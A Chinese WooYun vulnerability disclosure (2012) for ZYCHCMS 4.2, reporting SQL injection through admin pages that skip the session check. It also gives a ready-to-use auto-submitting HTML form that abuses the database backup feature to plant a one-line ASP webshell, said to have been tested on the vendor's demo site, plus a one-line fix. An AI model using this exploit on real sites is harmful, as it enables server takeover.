当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-010526

漏洞标题:ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

相关厂商:自由策划视觉设计工作室

漏洞作者: 无敌金创药

提交时间:2012-08-03 15:25

修复时间:2012-09-17 15:26

公开时间:2012-09-17 15:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-08-03: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-09-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

①SQL注射漏洞
②后台拿WBSHELL

详细说明:

影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
①SQL注射漏洞
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
漏洞原因:未过滤
漏洞代码:
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
②后台拿WBSHELL
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
这里在网上找了一个,改了下,将就着用。看效果如图2
以下是代码本地提交代码

<form method="post" action="http://localhost/admin/Manage_backup.asp?action=Backup" name=add>
<!--eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup-->
<tr>
<td height="30" background="images/bg_list.gif"><div style="padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left">备份数据库</div></td>
</tr>
<tr>
<td bgcolor="#FFFFFF"><span class="back_southidc">

</span>
<table width="100%" border="0" align="center" cellpadding="5" cellspacing="0" >
<tr onmouseover="style.backgroundColor='#EEEEEE'" onmouseout="style.backgroundColor='#F1F5F8'" bgcolor="#F1F5F8" >
<td height="25" width="30%" class="td"><div align="left">当前数据库路径</div></td>
<td width="70%" class="td">
<div align="left">
<input type="text" size="30" name="DBpath" value="此处为你在其网站上传的图片格式一句话路径" />
<!--eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
<input type="hidden" size="50" name="bkfolder" value="123.asp" />
</div></td>
</tr>
<tr onmouseover="style.backgroundColor='#EEEEEE'" onmouseout="style.backgroundColor='#FFFFFF'" bgcolor="#FFFFFF">
<td height="25" width="30%" class="td"><div align="left">备份数据库名称</div></td>
<td class="td"><div align="left">
<input type="text" size="30" name="bkDBname" value="4.mdb" />
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
</tr>
<tr onmouseover="style.backgroundColor='#EEEEEE'" onmouseout="style.backgroundColor='#F1F5F8'" bgcolor="#F1F5F8">
<td height="25" width="30%" class="td"><div align="left"></div></td>
<td class="td"><div align="left">
<input type="submit" value="确定备份" class="btn"/>
</div></td>
</tr>
</table></td></tr></form>
</table>
</td>
</tr>
</table>
<script>
document.all.add.submit();
</script>

漏洞证明:

漏洞证明:我用官方演示站点做测试,如图1
备份一句话

修复方案:

修复方法:在文件开头加入代码
<!--#include file="seeion.asp"-->

版权声明:转载请注明来源 无敌金创药@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝